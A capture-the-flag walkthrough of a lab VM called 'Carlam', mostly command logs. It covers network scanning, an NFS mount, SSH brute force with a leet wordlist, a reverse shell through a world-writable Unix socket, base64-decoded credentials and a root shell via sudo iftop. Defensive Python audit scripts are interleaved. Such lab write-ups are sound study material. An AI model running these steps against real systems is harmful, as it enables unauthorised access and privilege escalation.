```
❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.171  08:00:27:75:82:e2       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:ef:e4:ce       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.044 seconds (125.24 hosts/sec). 4 responded
❯ export ip=192.168.60.171
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.171:22
Open 192.168.60.171:111
Open 192.168.60.171:139
Open 192.168.60.171:445
Open 192.168.60.171:2049
Open 192.168.60.171:32947
Open 192.168.60.171:34643
Open 192.168.60.171:38753
Open 192.168.60.171:42273
Open 192.168.60.171:53253
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-07 20:34 CST
Initiating ARP Ping Scan at 20:34
Scanning 192.168.60.171 [1 port]
Completed ARP Ping Scan at 20:34, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:34
Completed Parallel DNS resolution of 1 host. at 20:34, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:34
Scanning 192.168.60.171 [10 ports]
Discovered open port 32947/tcp on 192.168.60.171
Discovered open port 38753/tcp on 192.168.60.171
Discovered open port 111/tcp on 192.168.60.171
Discovered open port 22/tcp on 192.168.60.171
Discovered open port 445/tcp on 192.168.60.171
Discovered open port 139/tcp on 192.168.60.171
Discovered open port 53253/tcp on 192.168.60.171
Discovered open port 34643/tcp on 192.168.60.171
Discovered open port 42273/tcp on 192.168.60.171
Discovered open port 2049/tcp on 192.168.60.171
Completed SYN Stealth Scan at 20:34, 0.03s elapsed (10 total ports)
Nmap scan report for 192.168.60.171
Host is up, received arp-response (0.00072s latency).
Scanned at 2025-05-07 20:34:59 CST for 0s

PORT      STATE SERVICE      REASON
22/tcp    open  ssh          syn-ack ttl 64
111/tcp   open  rpcbind      syn-ack ttl 64
139/tcp   open  netbios-ssn  syn-ack ttl 64
445/tcp   open  microsoft-ds syn-ack ttl 64
2049/tcp  open  nfs          syn-ack ttl 64
32947/tcp open  unknown      syn-ack ttl 64
34643/tcp open  unknown      syn-ack ttl 64
38753/tcp open  unknown      syn-ack ttl 64
42273/tcp open  unknown      syn-ack ttl 64
53253/tcp open  unknown      syn-ack ttl 64
MAC Address: 08:00:27:75:82:E2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
           Raw packets sent: 11 (468B) | Rcvd: 11 (468B)
```
There is no web server on the usual port 80, but NFS is exposed, and so is SMB.

NFS mount

First, list which directories the NFS server exports.
```
❯ showmount -e $ip
Export list for 192.168.60.171:
/tmp/carlam *
/srv/share  *
```
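Both exports above carry the client spec `*`, meaning any host that can reach port 2049 may mount them. As an added check that is not part of the original write-up, the following Python audit parses `showmount -e` output in that format and flags world-mountable exports; it also parses a constructed `/etc/exports` fragment (the box's real file is never shown, so its contents are my assumption) to show a weak line next to a restricted one.

```python
import re

# Constructed sample in the format printed by `showmount -e`; the two paths
# mirror the exports seen on the target.
SHOWMOUNT_OUTPUT = """\
Export list for 192.168.60.171:
/tmp/carlam *
/srv/share  *
"""

# Constructed (hypothetical) /etc/exports text: a weak line beside a hardened one.
EXPORTS_FILE = """\
# weak: every client, read-write, client root is not squashed
/srv/share  *(rw,sync,no_root_squash)
# hardened: one subnet, read-only, root squashed (the server default)
/srv/share  192.168.60.0/24(ro,sync,root_squash)
"""


def parse_showmount(text):
    """Return {export_path: [client_spec, ...]} from `showmount -e` output."""
    exports = {}
    for line in text.splitlines()[1:]:            # first line is the "Export list for" header
        line = line.strip()
        if not line:
            continue
        path, _, clients = line.partition(" ")
        exports[path] = clients.strip().split(",")  # showmount joins several clients with commas
    return exports


def parse_exports_file(text):
    """Return [(path, client_spec, {option, ...}), ...] from /etc/exports syntax."""
    token_re = re.compile(r"^([^(]+)(?:\(([^)]*)\))?$")   # client or client(opt,opt)
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()          # drop comments
        if not line:
            continue
        path, _, rest = line.partition(" ")
        for token in rest.split():
            match = token_re.match(token)
            if not match:
                continue
            options = {o for o in (match.group(2) or "").split(",") if o}
            entries.append((path, match.group(1), options))
    return entries


def audit_showmount(exports):
    """Paths that any host may mount (client spec '*')."""
    return sorted(path for path, clients in exports.items() if "*" in clients)


def audit_exports(entries):
    """Per-entry findings; an empty result means every line is restricted."""
    findings = []
    for path, client, options in entries:
        problems = []
        if client == "*":
            problems.append("exported to every host")
        if "rw" in options:
            problems.append("read-write")
        if "no_root_squash" in options:
            problems.append("no_root_squash: client root acts as server root")
        if problems:
            findings.append((path, client, problems))
    return findings


if __name__ == "__main__":
    print("world-mountable:", audit_showmount(parse_showmount(SHOWMOUNT_OUTPUT)))
    for path, client, problems in audit_exports(parse_exports_file(EXPORTS_FILE)):
        print(f"{path} {client}: {', '.join(problems)}")
```

Only the wildcard `*` is flagged as world-mountable; host patterns such as `*.example.com` or a subnet still restrict who can mount and are reported only for their options.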
Try mounting /srv/share.

This yields three files; the hidden .notes file contains a hint not to use leet.

There is also a short piece of micro-fiction, whose purpose is not obvious yet.
```
❯ mkdir nfs
❯ sudo mount -t nfs $ip:/srv/share ~/vulnyx/nfs
[sudo] password for Pepster:
❯ cd nfs
❯ ls -al
total 416
drwxrwxrwx  2 root    root      4096 May  6 05:36 .
drwxr-xr-x 15 Pepster Pepster  36864 May  7 20:39 ..
-rw-rw-r--  1 Pepster Pepster 372208 May  6 04:47 carlampio.jpg
-rw-rw-r--  1 Pepster Pepster    542 May  6 04:47 microrelato.txt
-rw-r--r--  1 Pepster Pepster     74 May  6 04:42 .notes
❯ cat .notes
Upgrade packages
Remove unused applications
Not use Leet
Remove old users
❯ cat microrelato.txt
Con ese amargor tan extraño, que primero le acompañó en las fiestas de guardar. Después, amargo, que baja por la laringe, para los fines de semana; y casi sin darse cuenta amargor dulzón de entre semana, que los días se hacen muy largos... Pero más agrio fue el día que entró en el juzgado para defender al pobre camello. Acre, como la condena por atentado contra la salud pública. Y más bien agridulce sabor con la garganta amarga para argumentar tristemente, entre sus dientes dormidos: - La sociedad es la culpable, señoría-.
```
My guess was that the story was meant to serve as a wordlist, run through leet substitution and then brute-forced.

That attempt went nowhere, so I used enum4linux to probe the SMB service.

It turns up three users: carlampio, xiroi and aitana.
```
❯ enum4linux -a $ip
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
```
```
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: carlampio
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):

> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):

> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):

> Pet's name:
> Company name:

> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]: Y

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to carlampio.txt, counting 16 words.
> Hyperspeed Print? (Y/n) :
[+] Now load your pistolero with carlampio.txt and shoot! Good luck!
```
User privilege escalation

Brute forcing with that list yields the credentials carlampio:C4rl4mp10.
```
❯ hydra -l carlampio -P carlampio.txt ssh://$ip -I -e ns
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-07 20:45:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 18 login tries (l:1/p:18), ~2 tries per task
[DATA] attacking ssh://192.168.60.171:22/
[22][ssh] host: 192.168.60.171   login: carlampio   password: C4rl4mp10
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-07 20:45:58
```
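The password that fell here is just the username with leet substitutions, which is exactly what a targeted wordlist generator enumerates first. The defensive counterpart is a password-policy check that rejects any password containing a leet-spelled variant of the account name (or of other names tied to the account). The code below is an added example, not part of the write-up; the substitution table, the function names and the length threshold are my own assumptions.

```python
import re

# Substitutions a password may use to disguise a name.  Hypothetical table
# chosen for this example; extend it to match the generators you see in use.
LEET = {
    "a": "4@", "b": "8", "e": "3", "g": "9", "i": "1!|",
    "l": "1|", "o": "0", "s": "5$", "t": "7+", "z": "2",
}


def leet_pattern(word):
    """Build a regex that matches `word` spelled with any mix of plain and
    leet characters, e.g. 'carlampio' also matches 'C4rl4mp10'."""
    parts = []
    for ch in word.lower():
        alternatives = ch + LEET.get(ch, "")
        parts.append("[" + re.escape(alternatives) + "]")   # one character class per letter
    return re.compile("".join(parts), re.IGNORECASE)


def contains_name_variant(password, name):
    """True if `name` (plain or leet-transformed) appears anywhere in `password`."""
    if not name:
        return False
    return leet_pattern(name).search(password) is not None


def check_password(password, username, related_names=(), min_length=12):
    """Return the list of policy failures; an empty list means the password passes."""
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    for name in (username, *related_names):
        if contains_name_variant(password, name):
            problems.append(f"contains a leet variant of '{name}'")
    return problems


if __name__ == "__main__":
    for pw, user in (("C4rl4mp10", "carlampio"), ("41t4n4S_S3cr3t", "aitana"),
                     ("correct-horse-battery", "carlampio")):
        print(f"{user}: {pw!r} -> {check_password(pw, user) or 'ok'}")
```

The check is deliberately substring-based and case-insensitive so that prefixes, suffixes and capital letters do not let a name slip through; a real deployment would feed `related_names` from the directory attributes a generator would use, such as given name, surname and nickname.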
Try logging in over SSH.
```
❯ ssh carlampio@$ip
The authenticity of host '192.168.60.171 (192.168.60.171)' can't be established.
ED25519 key fingerprint is SHA256:ykzjBJGULKXUmEAwPTuY9AL1Bjo/IkqaqEZfM5RsY4I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.171' (ED25519) to the list of known hosts.
carlampio@192.168.60.171's password:
Permission denied, please try again.
carlampio@192.168.60.171's password:
Welcome to CARLAM!
VM Vulnerable to improve your hacking skills
by Micky
carlam:~$ cat user.txt
23bdb9bfae27f13a9e216fa72fcdf9c5
```
I went back to enumeration and noticed that /tmp contains no carlam directory at all.

Socket connection

There is, however, an app.sock file: a Unix domain socket.
```
carlam:~$ cd /tmp/
carlam:/tmp$ ls -al
total 16
drwxrwxrwt    4 root     root          4096 May  7 14:33 .
drwxr-xr-x   21 root     root          4096 May  5 22:04 ..
drwxrwxrwt    2 root     root          4096 May  7 14:33 .ICE-unix
drwxrwxrwt    2 root     root          4096 May  7 14:33 .X11-unix
srwxrwxrwx    1 xiroi    xiroi            0 May  7 14:33 app.sock
```
At first I tried to use the rw export of /tmp/carlam in the NFS configuration to write files into that directory from my machine.

For some reason the mount failed with a stale file handle. It had worked earlier, but not when I reproduced the steps 😅
```
carlam:/tmp$ id
uid=1000(carlampio) gid=1000(carlampio) groups=1000(carlampio)
carlam:/tmp$ mkdir carlam
carlam:/tmp$ cd carlam/
-----------------------------------
❯ mkdir carlam
❯ sudo mount -t nfs $ip:/tmp/carlam ~/vulnyx/carlam
mount.nfs: Stale file handle for 192.168.60.171:/tmp/carlam on /home/Pepster/vulnyx/carlam
❯ cd carlam
```
```
carlam:/tmp$ which socat
/usr/bin/socat
carlam:/tmp$ socat - unix-connect:/tmp/app.sock
aa
What the hell?. Use 'help'.
carlam:/tmp$ socat - unix-connect:/tmp/app.sock
help
Commands:
  help                  → Show this messaje
  whoami                → Show real user
  list                  → List files in /home/xiroi
  create_reverse_shell  → Shell in 4444
```
Open a second terminal and connect.
```
❯ ssh carlampio@$ip
carlampio@192.168.60.171's password:
Welcome to CARLAM!
VM Vulnerable to improve your hacking skills
by Micky
carlam:~$ nc -lvp 4444
listening on [::]:4444 ...
------------------
carlam:/tmp$ socat - unix-connect:/tmp/app.sock
create_reverse_shell
[xiroi] Shell in 4444
carlam:/tmp$
```

```
carlam:~$ nc -lvp 4444
listening on [::]:4444 ...
connect to [::ffff:127.0.0.1]:4444 from carlam.my.domain:42181 ([::ffff:127.0.0.1]:42181)
/bin/ash: can't access tty; job control turned off
/ $ bash
/bin/ash: bash: not found
/ $ id
uid=1001(xiroi) gid=1001(xiroi) groups=1001(xiroi)
/ $ cd ~
/home/xiroi $ ls -al
total 40
drwxr-x---    5 xiroi    xiroi         4096 May  6 04:46 .
drwxr-xr-x    5 root     root          4096 May  6 01:21 ..
drwxr-xr-x    2 xiroi    xiroi         4096 May  6 04:43 .apps
-rw-------    1 xiroi    xiroi           21 May  6 04:50 .ash_history
drwxr-xr-x    2 xiroi    xiroi         4096 May  6 04:44 .conf
drwx------    2 xiroi    xiroi         4096 May  6 04:40 .ssh
-rwxr-xr-x    1 xiroi    xiroi        15600 May  6 03:51 app
/home/xiroi $ cd .conf
/home/xiroi/.conf $ ls -al
total 20
drwxr-xr-x    2 xiroi    xiroi         4096 May  6 04:44 .
drwxr-x---    5 xiroi    xiroi         4096 May  6 04:46 ..
-rw-r--r--    1 xiroi    xiroi           13 May  6 04:44 .hi
-rw-r--r--    1 xiroi    xiroi           33 May  6 04:42 .scrt
-rw-r--r--    1 xiroi    xiroi           13 May  6 04:44 sort
/home/xiroi/.conf $ cat *
132409878765
/home/xiroi/.conf $ cat .*
cat: read error: Is a directory
cat: read error: Is a directory
abcdefghi...
YWl0YW5hOjQxdDRuNFNfUzNjcjN0Cg==
```
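The weakness behind this lateral move is the socket's mode: `srwxrwxrwx` on app.sock means any local account can connect to a service that runs as xiroi, because on Linux connecting to a Unix socket requires write permission on the socket inode. The following audit is an added example, not code from the write-up or the box: it walks a directory tree, reports every Unix socket with the world-write bit, and includes a constructed scenario (two sockets in a temporary directory, one left 0777 like app.sock, one restricted to its owner) so it can be run anywhere.

```python
import os
import socket
import stat
import tempfile


def world_writable_sockets(root):
    """Walk `root` and return (path, owner_uid, mode) for each Unix socket
    whose permission bits let any user connect (S_IWOTH set)."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:                 # os.walk lists sockets among non-directories
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)            # lstat: never follow symlinks
            except OSError:
                continue                       # vanished or unreadable; skip
            if stat.S_ISSOCK(st.st_mode) and st.st_mode & stat.S_IWOTH:
                hits.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return hits


def demo():
    """Constructed scenario with hypothetical paths: one socket chmod 0777 as
    app.sock was on the box, one chmod 0700.  Returns the basenames flagged."""
    with tempfile.TemporaryDirectory() as tmp:
        listeners = []
        for name, mode in (("app.sock", 0o777), ("private.sock", 0o700)):
            s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            path = os.path.join(tmp, name)
            s.bind(path)                       # bind creates the socket inode
            os.chmod(path, mode)               # the mode decides who may connect
            listeners.append(s)
        flagged = sorted(os.path.basename(p) for p, _, _ in world_writable_sockets(tmp))
        for s in listeners:
            s.close()
    return flagged


if __name__ == "__main__":
    for path, uid, mode in world_writable_sockets("/tmp"):
        print(f"{mode} uid={uid} {path}")
    print("demo flagged:", demo())
```

Run against `/tmp` or `/run` on a host, the first loop prints each world-connectable socket with its owner, which is the signal to look for when a service like `app` exposes privileged actions to whoever can reach its socket. The fix on the server side is the same as for any IPC endpoint: create the socket in a directory only the intended clients can enter, set a restrictive umask before binding, and have the service check `SO_PEERCRED` before honouring commands.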
Root privilege escalation

Decoding the base64 gives the credentials aitana:41t4n4S_S3cr3t.

Log in again as that user; the account has sudo rights.
```
/home/xiroi/.conf $ cat .scrt|base64 -d
aitana:41t4n4S_S3cr3t
---------------------------------
carlam:/tmp$ su aitana
Password:
carlam:/tmp$ id
uid=1002(aitana) gid=1002(aitana) groups=1002(aitana)
carlam:/tmp$ sudo -l
User aitana may run the following commands on carlam:
    (ALL) NOPASSWD: /usr/sbin/iftop
```
Type !/bin/sh at the iftop prompt.

The usual escalation follows.
```
carlam:/tmp$ sudo /usr/sbin/iftop
interface: eth0
IP address is: 192.168.60.171
MAC address is: 08:00:27:75:82:e2
carlam:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
carlam:~# cat /root/root.txt
9755cbb374f1a6b47d52160a452b7084
```